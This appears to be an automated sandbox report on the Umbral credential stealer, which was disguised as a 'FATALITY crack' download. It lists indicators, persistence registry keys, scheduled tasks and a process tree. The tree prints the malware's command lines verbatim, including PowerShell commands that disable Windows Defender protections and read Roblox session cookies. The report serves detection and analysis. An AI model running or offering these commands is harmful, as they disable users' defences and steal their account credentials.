umbral | 48fa7c81eedbd5766d91bf8794b21a925e31a5d153a23acdec9138cf4781a540

Analysis

max time kernel
23s
max time network
27s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
16-07-2024 10:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FATALITY crack/FATALITY.exe
Size

2.5MB
MD5

4320dae0d20c88ceb6f28b623a916dd2
SHA1

c1218c51804a602115462ea8259578fdbb280468
SHA256

441d4439cd72a239077d97895571804711356f1e1ded396c229635adf3c80ea4
SHA512

ee32e90d021835d608d43d3ee6d2d107fcfb15fa174c179ed4ae7dd47ec0dd45baadd1c73158c73d5e4fd7b89f5925ae505a6df66bb81e9d5693216316622fcf
SSDEEP

49152:U14vPsUk84QgsmsQgt/KOQtLvwnQ/7syEL+mZ1TxrYgHZfr2gsNS1zb9cVg1Z2U/:JPtmLgtTGTwQAyY3TdYCsI1zAgb27wh

Score

10^/10

umbral execution persistence spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0009000000023432-12.dat	family_umbral
behavioral2/memory/4104-29-0x00000296232A0000-0x00000296232E0000-memory.dmp	family_umbral

Modifies WinLogon for persistence 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Crashpad\\System.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\it-IT\\RuntimeBroker.exe\""	ComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Crashpad\\System.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\it-IT\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\""	ComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Crashpad\\System.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\it-IT\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\", \"C:\\Windows\\Cursors\\RuntimeBroker.exe\""	ComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Crashpad\\System.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\it-IT\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\", \"C:\\Windows\\Cursors\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\services.exe\""	ComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Crashpad\\System.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\it-IT\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\", \"C:\\Windows\\Cursors\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\services.exe\", \"C:\\PortFontnetCommon\\ComBroker.exe\""	ComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Crashpad\\System.exe\""	ComBroker.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1820	948	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4232	948	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	60	948	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4044	948	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5084	948	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3260	948	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4504	948	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3188	948	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4596	948	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2376	948	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3928	948	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4280	948	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4780	948	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2292	948	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	228	948	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1324	948	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	316	948	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4304	948	schtasks.exe	89

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2388	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation	FATALITY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation	ComBroker.exe

Executes dropped EXE 5 IoCs

pid	Process
2964	FATALITY.exe
4104	Umbral.exe
3672	Windows Defender.exe
3192	ComBroker.exe
900	System.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\Cursors\\RuntimeBroker.exe\""	ComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\Cursors\\RuntimeBroker.exe\""	ComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ComBroker = "\"C:\\PortFontnetCommon\\ComBroker.exe\""	ComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\it-IT\\RuntimeBroker.exe\""	ComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\""	ComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Recovery\\WindowsRE\\StartMenuExperienceHost.exe\""	ComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Recovery\\WindowsRE\\services.exe\""	ComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Recovery\\WindowsRE\\services.exe\""	ComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ComBroker = "\"C:\\PortFontnetCommon\\ComBroker.exe\""	ComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files\\Crashpad\\System.exe\""	ComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files\\Crashpad\\System.exe\""	ComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\it-IT\\RuntimeBroker.exe\""	ComBroker.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
23	discord.com
24	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	\??\c:\Windows\System32\CSC4D61D42B296D42519CD99675647E202F.TMP	csc.exe
File created	\??\c:\Windows\System32\u9kzos.exe	csc.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows Photo Viewer\it-IT\RuntimeBroker.exe	ComBroker.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\it-IT\9e8d7a4ca61bd9	ComBroker.exe
File created	C:\Program Files\Crashpad\System.exe	ComBroker.exe
File created	C:\Program Files\Crashpad\27d1bcfc3c54e0	ComBroker.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Cursors\RuntimeBroker.exe	ComBroker.exe
File created	C:\Windows\Cursors\9e8d7a4ca61bd9	ComBroker.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2384	wmic.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings	FATALITY.exe
Key created	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings	ComBroker.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1016	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4280	schtasks.exe
4780	schtasks.exe
4304	schtasks.exe
5084	schtasks.exe
3260	schtasks.exe
4596	schtasks.exe
2292	schtasks.exe
3188	schtasks.exe
228	schtasks.exe
1324	schtasks.exe
316	schtasks.exe
1820	schtasks.exe
4232	schtasks.exe
4504	schtasks.exe
2376	schtasks.exe
3928	schtasks.exe
60	schtasks.exe
4044	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4104	Umbral.exe
2388	powershell.exe
2388	powershell.exe
3440	powershell.exe
3440	powershell.exe
4252	powershell.exe
4252	powershell.exe
1184	powershell.exe
1184	powershell.exe
3932	powershell.exe
3932	powershell.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe
3192	ComBroker.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4104	Umbral.exe
Token: SeIncreaseQuotaPrivilege	2468	wmic.exe
Token: SeSecurityPrivilege	2468	wmic.exe
Token: SeTakeOwnershipPrivilege	2468	wmic.exe
Token: SeLoadDriverPrivilege	2468	wmic.exe
Token: SeSystemProfilePrivilege	2468	wmic.exe
Token: SeSystemtimePrivilege	2468	wmic.exe
Token: SeProfSingleProcessPrivilege	2468	wmic.exe
Token: SeIncBasePriorityPrivilege	2468	wmic.exe
Token: SeCreatePagefilePrivilege	2468	wmic.exe
Token: SeBackupPrivilege	2468	wmic.exe
Token: SeRestorePrivilege	2468	wmic.exe
Token: SeShutdownPrivilege	2468	wmic.exe
Token: SeDebugPrivilege	2468	wmic.exe
Token: SeSystemEnvironmentPrivilege	2468	wmic.exe
Token: SeRemoteShutdownPrivilege	2468	wmic.exe
Token: SeUndockPrivilege	2468	wmic.exe
Token: SeManageVolumePrivilege	2468	wmic.exe
Token: 33	2468	wmic.exe
Token: 34	2468	wmic.exe
Token: 35	2468	wmic.exe
Token: 36	2468	wmic.exe
Token: SeIncreaseQuotaPrivilege	2468	wmic.exe
Token: SeSecurityPrivilege	2468	wmic.exe
Token: SeTakeOwnershipPrivilege	2468	wmic.exe
Token: SeLoadDriverPrivilege	2468	wmic.exe
Token: SeSystemProfilePrivilege	2468	wmic.exe
Token: SeSystemtimePrivilege	2468	wmic.exe
Token: SeProfSingleProcessPrivilege	2468	wmic.exe
Token: SeIncBasePriorityPrivilege	2468	wmic.exe
Token: SeCreatePagefilePrivilege	2468	wmic.exe
Token: SeBackupPrivilege	2468	wmic.exe
Token: SeRestorePrivilege	2468	wmic.exe
Token: SeShutdownPrivilege	2468	wmic.exe
Token: SeDebugPrivilege	2468	wmic.exe
Token: SeSystemEnvironmentPrivilege	2468	wmic.exe
Token: SeRemoteShutdownPrivilege	2468	wmic.exe
Token: SeUndockPrivilege	2468	wmic.exe
Token: SeManageVolumePrivilege	2468	wmic.exe
Token: 33	2468	wmic.exe
Token: 34	2468	wmic.exe
Token: 35	2468	wmic.exe
Token: 36	2468	wmic.exe
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeDebugPrivilege	3440	powershell.exe
Token: SeDebugPrivilege	4252	powershell.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeIncreaseQuotaPrivilege	2504	wmic.exe
Token: SeSecurityPrivilege	2504	wmic.exe
Token: SeTakeOwnershipPrivilege	2504	wmic.exe
Token: SeLoadDriverPrivilege	2504	wmic.exe
Token: SeSystemProfilePrivilege	2504	wmic.exe
Token: SeSystemtimePrivilege	2504	wmic.exe
Token: SeProfSingleProcessPrivilege	2504	wmic.exe
Token: SeIncBasePriorityPrivilege	2504	wmic.exe
Token: SeCreatePagefilePrivilege	2504	wmic.exe
Token: SeBackupPrivilege	2504	wmic.exe
Token: SeRestorePrivilege	2504	wmic.exe
Token: SeShutdownPrivilege	2504	wmic.exe
Token: SeDebugPrivilege	2504	wmic.exe
Token: SeSystemEnvironmentPrivilege	2504	wmic.exe
Token: SeRemoteShutdownPrivilege	2504	wmic.exe
Token: SeUndockPrivilege	2504	wmic.exe
Token: SeManageVolumePrivilege	2504	wmic.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 5088 wrote to memory of 2964	5088	FATALITY.exe	86
PID 5088 wrote to memory of 2964	5088	FATALITY.exe	86
PID 5088 wrote to memory of 2964	5088	FATALITY.exe	86
PID 5088 wrote to memory of 4104	5088	FATALITY.exe	87
PID 5088 wrote to memory of 4104	5088	FATALITY.exe	87
PID 5088 wrote to memory of 3672	5088	FATALITY.exe	88
PID 5088 wrote to memory of 3672	5088	FATALITY.exe	88
PID 5088 wrote to memory of 3672	5088	FATALITY.exe	88
PID 2964 wrote to memory of 4988	2964	FATALITY.exe	90
PID 2964 wrote to memory of 4988	2964	FATALITY.exe	90
PID 2964 wrote to memory of 4988	2964	FATALITY.exe	90
PID 4104 wrote to memory of 2468	4104	Umbral.exe	91
PID 4104 wrote to memory of 2468	4104	Umbral.exe	91
PID 4104 wrote to memory of 944	4104	Umbral.exe	93
PID 4104 wrote to memory of 944	4104	Umbral.exe	93
PID 4104 wrote to memory of 2388	4104	Umbral.exe	95
PID 4104 wrote to memory of 2388	4104	Umbral.exe	95
PID 4104 wrote to memory of 3440	4104	Umbral.exe	97
PID 4104 wrote to memory of 3440	4104	Umbral.exe	97
PID 4104 wrote to memory of 4252	4104	Umbral.exe	99
PID 4104 wrote to memory of 4252	4104	Umbral.exe	99
PID 4104 wrote to memory of 1184	4104	Umbral.exe	101
PID 4104 wrote to memory of 1184	4104	Umbral.exe	101
PID 4104 wrote to memory of 2504	4104	Umbral.exe	103
PID 4104 wrote to memory of 2504	4104	Umbral.exe	103
PID 4104 wrote to memory of 1136	4104	Umbral.exe	105
PID 4104 wrote to memory of 1136	4104	Umbral.exe	105
PID 4104 wrote to memory of 3572	4104	Umbral.exe	107
PID 4104 wrote to memory of 3572	4104	Umbral.exe	107
PID 4104 wrote to memory of 3932	4104	Umbral.exe	109
PID 4104 wrote to memory of 3932	4104	Umbral.exe	109
PID 4104 wrote to memory of 2384	4104	Umbral.exe	111
PID 4104 wrote to memory of 2384	4104	Umbral.exe	111
PID 4988 wrote to memory of 3452	4988	WScript.exe	113
PID 4988 wrote to memory of 3452	4988	WScript.exe	113
PID 4988 wrote to memory of 3452	4988	WScript.exe	113
PID 3452 wrote to memory of 3192	3452	cmd.exe	115
PID 3452 wrote to memory of 3192	3452	cmd.exe	115
PID 4104 wrote to memory of 1444	4104	Umbral.exe	116
PID 4104 wrote to memory of 1444	4104	Umbral.exe	116
PID 1444 wrote to memory of 1016	1444	cmd.exe	118
PID 1444 wrote to memory of 1016	1444	cmd.exe	118
PID 3192 wrote to memory of 2196	3192	ComBroker.exe	122
PID 3192 wrote to memory of 2196	3192	ComBroker.exe	122
PID 2196 wrote to memory of 696	2196	csc.exe	124
PID 2196 wrote to memory of 696	2196	csc.exe	124
PID 3192 wrote to memory of 372	3192	ComBroker.exe	140
PID 3192 wrote to memory of 372	3192	ComBroker.exe	140
PID 372 wrote to memory of 4836	372	cmd.exe	142
PID 372 wrote to memory of 4836	372	cmd.exe	142
PID 372 wrote to memory of 4208	372	cmd.exe	143
PID 372 wrote to memory of 4208	372	cmd.exe	143
PID 372 wrote to memory of 900	372	cmd.exe	144
PID 372 wrote to memory of 900	372	cmd.exe	144

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
944	attrib.exe

C:\Users\Admin\AppData\Local\Temp\FATALITY crack\FATALITY.exe
"C:\Users\Admin\AppData\Local\Temp\FATALITY crack\FATALITY.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5088
- C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
  "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2964
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\PortFontnetCommon\jnh1y.vbe"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4988
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\PortFontnetCommon\IOEmPpqly1DOIlscl2iPO8G0g.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3452
    - - C:\PortFontnetCommon\ComBroker.exe
        
        "C:\PortFontnetCommon/ComBroker.exe"
        5⤵
        Modifies WinLogon for persistence
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3192
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iau0ymgv\iau0ymgv.cmdline"
        6⤵
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:2196
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9E63.tmp" "c:\Windows\System32\CSC4D61D42B296D42519CD99675647E202F.TMP"
        7⤵
        
        PID:696
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Y8vXIQimrI.bat"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:372
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:4836
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:4208
        
        C:\Program Files\Crashpad\System.exe
        
        "C:\Program Files\Crashpad\System.exe"
        7⤵
        Executes dropped EXE
        
        PID:900
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4104
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2468
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:944
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4252
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1184
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2504
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:1136
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:3572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3932
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2384
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1444
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:1016
- C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
  "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
  2⤵
  - Executes dropped EXE
  PID:3672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Program Files\Crashpad\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1820

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Crashpad\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\Program Files\Crashpad\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:60

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4044

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4504

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Windows\Cursors\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Cursors\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3928

C:\Windows\system32\schtasks.exe
